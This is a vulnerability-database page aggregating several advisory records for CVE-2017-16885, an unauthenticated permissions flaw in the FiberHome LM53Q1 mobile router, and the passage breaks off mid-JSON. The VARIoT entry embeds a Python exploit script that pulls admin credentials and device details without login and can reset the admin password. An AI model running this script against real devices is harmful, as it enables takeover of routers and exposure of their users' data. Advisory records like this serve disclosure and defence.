CVE-2017-16885 (GCVE-0-2017-16885)

Vulnerability from cvelistv5 – Published: 2018-01-12 17:00 – Updated: 2024-08-05 20:35

Summary

Severity

9.8 (Critical)


                        
                          CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

Assigner

mitre

References

2 references

URL	Tags
https://www.exploit-db.com/exploits/43460/	exploitx_refsource_EXPLOIT-DB
http://seclists.org/fulldisclosure/2018/Jan/28	mailing-listx_refsource_FULLDISC

Date Public

2018-01-07 00:00

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T20:35:21.324Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "43460",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/43460/"
          },
          {
            "name": "20180109 FiberHome MIFI LM53Q1 Multiple Vulnerabilities",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2018/Jan/28"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2018-01-07T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The information includes Version of device, Firmware ID, Connected users to device along their MAC Addresses, etc."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-01-12T16:57:01.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "43460",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/43460/"
        },
        {
          "name": "20180109 FiberHome MIFI LM53Q1 Multiple Vulnerabilities",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2018/Jan/28"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-16885",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The information includes Version of device, Firmware ID, Connected users to device along their MAC Addresses, etc."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "43460",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/43460/"
            },
            {
              "name": "20180109 FiberHome MIFI LM53Q1 Multiple Vulnerabilities",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2018/Jan/28"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-16885",
    "datePublished": "2018-01-12T17:00:00.000Z",
    "dateReserved": "2017-11-19T00:00:00.000Z",
    "dateUpdated": "2024-08-05T20:35:21.324Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2017-16885",
      "date": "2026-06-04",
      "epss": "0.07359",
      "percentile": "0.91848"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2017-16885\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2018-01-12T17:29:00.897\",\"lastModified\":\"2024-11-21T03:17:10.670\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The information includes Version of device, Firmware ID, Connected users to device along their MAC Addresses, etc.\"},{\"lang\":\"es\",\"value\":\"La gesti\u00f3n indebida de permisos en el portal en dispositivos FiberHome LM53Q1 VH519R05C01S38 (dise\u00f1ados para obtener informaci\u00f3n sobre el uso de Internet, cambiar contrase\u00f1as, etc.) permite que atacantes remotos busquen la informaci\u00f3n sin autenticarse. Esta informaci\u00f3n incluye la versi\u00f3n del dispositivo, el ID del firmware, los usuarios que est\u00e1n conectados al dispositivo junto con sus direcciones MAC, etc.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:N/A:N\",\"baseScore\":5.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":10.0,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-732\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:fiberhome:lm53q1_firmware:vh519r05c01s38:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"8AE0B4C9-DF2A-4DB8-9925-FD2659D0D0D5\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:fiberhome:lm53q1:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3A459B20-2F60-4CB2-BDEE-925DD450636C\"}]}]}],\"references\":[{\"url\":\"http://seclists.org/fulldisclosure/2018/Jan/28\",\"source\":\"cve@mitre.org\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://www.exploit-db.com/exploits/43460/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2018/Jan/28\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://www.exploit-db.com/exploits/43460/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]}]}}"
  }
}

CNVD-2018-04063

Vulnerability from cnvd - Published: 2018-03-02

Title

FiberHome LM53Q1信息泄露漏洞

Description

FiberHome LM53Q1是中国烽火（FiberHome）公司的一款便携式路由器设备。 FiberHome LM53Q1 VH519R05C01S38版本中的Portal存在信息泄露漏洞，该漏洞源于程序未能正确的处理权限。远程攻击者可利用该漏洞查找信息（例如：设备的版本、固件ID等）。

Severity

中

Formal description

目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法： http://www.fiberhome.com

Reference

http://seclists.org/fulldisclosure/2018/Jan/28 https://www.exploit-db.com/exploits/43460/

Impacted products

Name
Fiberhome LM53Q1 VH519R05C01S38

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2017-16885"
    }
  },
  "description": "FiberHome LM53Q1\u662f\u4e2d\u56fd\u70fd\u706b\uff08FiberHome\uff09\u516c\u53f8\u7684\u4e00\u6b3e\u4fbf\u643a\u5f0f\u8def\u7531\u5668\u8bbe\u5907\u3002\r\n\r\nFiberHome LM53Q1 VH519R05C01S38\u7248\u672c\u4e2d\u7684Portal\u5b58\u5728\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7a0b\u5e8f\u672a\u80fd\u6b63\u786e\u7684\u5904\u7406\u6743\u9650\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u67e5\u627e\u4fe1\u606f\uff08\u4f8b\u5982\uff1a\u8bbe\u5907\u7684\u7248\u672c\u3001\u56fa\u4ef6ID\u7b49\uff09\u3002",
  "discovererName": "Taimoor Zafar, Aitezaz Mohsin, Jawad Ahmed",
  "formalWay": "\u76ee\u524d\u5382\u5546\u6682\u672a\u53d1\u5e03\u4fee\u590d\u63aa\u65bd\u89e3\u51b3\u6b64\u5b89\u5168\u95ee\u9898\uff0c\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u4e3b\u9875\u6216\u53c2\u8003\u7f51\u5740\u4ee5\u83b7\u53d6\u89e3\u51b3\u529e\u6cd5\uff1a\r\nhttp://www.fiberhome.com",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2018-04063",
  "openTime": "2018-03-02",
  "products": {
    "product": "Fiberhome LM53Q1 VH519R05C01S38"
  },
  "referenceLink": "http://seclists.org/fulldisclosure/2018/Jan/28\r\nhttps://www.exploit-db.com/exploits/43460/",
  "serverity": "\u4e2d",
  "submitTime": "2018-01-11",
  "title": "FiberHome LM53Q1\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e"
}

FKIE_CVE-2017-16885

Vulnerability from fkie_nvd - Published: 2018-01-12 17:29 - Updated: 2024-11-21 03:17

Severity

9.8 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
cve@mitre.org	http://seclists.org/fulldisclosure/2018/Jan/28	Mailing List, Third Party Advisory
cve@mitre.org	https://www.exploit-db.com/exploits/43460/	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2018/Jan/28	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/43460/	Exploit, Third Party Advisory, VDB Entry

Impacted products

	Vendor	Product	Version
	fiberhome	lm53q1_firmware	vh519r05c01s38
	fiberhome	lm53q1	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:fiberhome:lm53q1_firmware:vh519r05c01s38:*:*:*:*:*:*:*",
              "matchCriteriaId": "8AE0B4C9-DF2A-4DB8-9925-FD2659D0D0D5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:fiberhome:lm53q1:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A459B20-2F60-4CB2-BDEE-925DD450636C",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The information includes Version of device, Firmware ID, Connected users to device along their MAC Addresses, etc."
    },
    {
      "lang": "es",
      "value": "La gesti\u00f3n indebida de permisos en el portal en dispositivos FiberHome LM53Q1 VH519R05C01S38 (dise\u00f1ados para obtener informaci\u00f3n sobre el uso de Internet, cambiar contrase\u00f1as, etc.) permite que atacantes remotos busquen la informaci\u00f3n sin autenticarse. Esta informaci\u00f3n incluye la versi\u00f3n del dispositivo, el ID del firmware, los usuarios que est\u00e1n conectados al dispositivo junto con sus direcciones MAC, etc."
    }
  ],
  "id": "CVE-2017-16885",
  "lastModified": "2024-11-21T03:17:10.670",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-01-12T17:29:00.897",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2018/Jan/28"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/43460/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2018/Jan/28"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/43460/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-732"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-8M73-PC64-X44P

Vulnerability from github – Published: 2022-05-13 01:44 – Updated: 2022-05-13 01:44

Details

Severity

9.8 (Critical)


                  
                    CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2017-16885"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-732"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-01-12T17:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The information includes Version of device, Firmware ID, Connected users to device along their MAC Addresses, etc.",
  "id": "GHSA-8m73-pc64-x44p",
  "modified": "2022-05-13T01:44:13Z",
  "published": "2022-05-13T01:44:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16885"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/43460"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2018/Jan/28"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GSD-2017-16885

Vulnerability from gsd - Updated: 2023-12-13 01:21

Details

Aliases

CVE-2017-16885

Aliases

CVE-2017-16885

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2017-16885",
    "description": "Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The information includes Version of device, Firmware ID, Connected users to device along their MAC Addresses, etc.",
    "id": "GSD-2017-16885",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2017-16885"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2017-16885"
      ],
      "details": "Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The information includes Version of device, Firmware ID, Connected users to device along their MAC Addresses, etc.",
      "id": "GSD-2017-16885",
      "modified": "2023-12-13T01:21:01.093851Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2017-16885",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The information includes Version of device, Firmware ID, Connected users to device along their MAC Addresses, etc."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "43460",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/43460/"
          },
          {
            "name": "20180109 FiberHome MIFI LM53Q1 Multiple Vulnerabilities",
            "refsource": "FULLDISC",
            "url": "http://seclists.org/fulldisclosure/2018/Jan/28"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:fiberhome:lm53q1_firmware:vh519r05c01s38:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:fiberhome:lm53q1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-16885"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The information includes Version of device, Firmware ID, Connected users to device along their MAC Addresses, etc."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-732"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "43460",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://www.exploit-db.com/exploits/43460/"
            },
            {
              "name": "20180109 FiberHome MIFI LM53Q1 Multiple Vulnerabilities",
              "refsource": "FULLDISC",
              "tags": [
                "Mailing List",
                "Third Party Advisory"
              ],
              "url": "http://seclists.org/fulldisclosure/2018/Jan/28"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2019-10-03T00:03Z",
      "publishedDate": "2018-01-12T17:29Z"
    }
  }
}

VAR-201801-0580

Vulnerability from variot - Updated: 2024-11-23 21:09

Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The information includes Version of device, Firmware ID, Connected users to device along their MAC Addresses, etc. FiberHome mobile WIFI Device model LM53Q1 Contains a permission vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The FiberHomeLM53Q1 is a portable router device from China FiberHome. There is an information disclosure vulnerability in the Portal in the FiberHomeLM53Q1VH519R05C01S38 version, which is caused by the program not processing the correct permissions. #!/usr/bin/python

/$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$

| $$_/|/| $$ | $$ | $$ | $$ $$ | $$ | $$_____/ | $$ |/ | $$

| $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$

| $$$$$ | $$| $$ $$ /$$ $$ /$$ $$| $$$$$$$$ /$$ $$| $$ $$ $$ /$$ $$ | $$$$$$$/ /$$ $$| $$ $$ $$ /$$ $$| $$/ /$$ $$ | $$$$$ | $$ /$$/ /$$ $$| $$ /$$ $$| $$| $$/

| $$/ | $$| $$ \ $$| $$$$$$$$| $$ __/| $$ $$| $$ \ $$| $$ \ $$ \ $$| $$$$$$$$ | $$ $$| $$$$$$$$| $$ \ $$ \ $$| $$ \ $$ | $$ | $$$$$$$$ | $$/ \ $$$$/ | $$ \ $$| $$| $$ \ $$| $$ | $$

| $$ | $$| $$ | $$| $$**_/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$*/ | $$ \ $$| $$***/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$___/ | $$ >$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$

| $$ | $$| $$$$$$$/| $$$$$$$| $$ | $$ | $$| $$$$$$/| $$ | $$ | $$| $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$ | $$$$$$$$ /$$/\ $$| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/

|/ |/|_/ _/|/ |/ |/ / |/ |/ |/ _/ |/ |/ _/|/ |/ |/ __/ _/ _/ |____/|/ _/| $$_/ |/ ____/ |/ _/

| $$

|__/

Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities

Exploit Author: Ibad Shah

Vendor Homepage: www.fiberhome.com

Version: VH519R05C01S38

Tested on: Linux

Platform : Hardware

CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887

Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC

import requests,sys,getopt,socket,struct

Declaring IP as our global variable to probe for Gateway IP of Device

global ip

Getting Gateway IP Address

def get_default_gateway_linux(): with open("/proc/net/route") as fh: for line in fh: fields = line.strip().split() if fields[1] != '00000000' or not int(fields[3], 16) & 2: continue return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16))) return;

ip = get_default_gateway_linux()

exploit_title = "=============================================== \n FiberHome Remote Administrator Account Details \n================================================";

Function to get Device Statistics

def get_device_details():

gateway = None
hardware = None
device_name = None
devices_all = ''
version = None
gateway = None
ssid = ''
dns1 = None
dns2 = None


requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1")
api_response = requestStatus.content.replace('\t','').split('\n')
for results in api_response:
        if "<hardware_version>" in results:
                hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','')
        if "<device_name>" in results:
                device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','')
        if "<version_num>" in results:
                version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','')
        if "<gateway>" in results:
                gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','')
        if "<ssid>" in results:
                ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','')
        if "<dns1>" in results:
                dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','')
        if "<dns2>" in results:
                dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','')
        if "<IMEI>" in results:
                imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','')
                print "\n=============================================="

                print "\nHardware Version of Device : "+hardware+"\n"
                print "\nName of Device : "+device_name+"\n"
                print "\nSoftware Version of Device : "+version+"\n"
                print "\nIMEI of Device! : "+imei+"\n"
                print "\nWiFi SSID of Device : "+ssid+"\n"
                print "\nGateway of Zong Device : "+gateway+"\n"
                print "\nDNS Primary of Device : "+dns1+"\n"
            print "\nDNS Secondary of Device : "+dns2+"\n"
                print "\n=============================================================================\n";
        if "<known_devices_list>" in results:
                devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','')
                print "\nConnected Devices to WIFI\n"
                print devices_all

Function for getting User Account Details to login to Portal

def get_user_account_details(): request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin") admin_details = request.content.replace('\t','').split('\n') for admin_login_response in admin_details: if "" in admin_login_response: username = admin_login_response.replace('','').replace('','') if "" in admin_login_response: password = admin_login_response.replace('','').replace('','') print "\nUsername of Device Web Application :\n"+username+" " print "Password of Device Web Application :\n"+password+"\n" print "\n=============================================================================\n";

Function to change Administrator Password

def change_admin_password(): set_password = raw_input("\nEnter Password to Change : ") password = str(set_password) xml = ""+password+"" headers = {'Content-Type': 'application/xml'} change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text print "Password Changed!"

def main():

print exploit_title
print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device"

get_option = raw_input("\n Enter Option :  ");

option = int(get_option)

if get_option == "1":

        get_user_account_details()

        raw_input("\n Press Any Key To Exit");

elif get_option == "2":

        get_device_details()

        raw_input("\n Press Any Key To Exit");

elif get_option == "3":

    change_admin_password()

elif get_option == "":

    print "Good Bye!";

else:

    print "Goodbye!";

main()

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
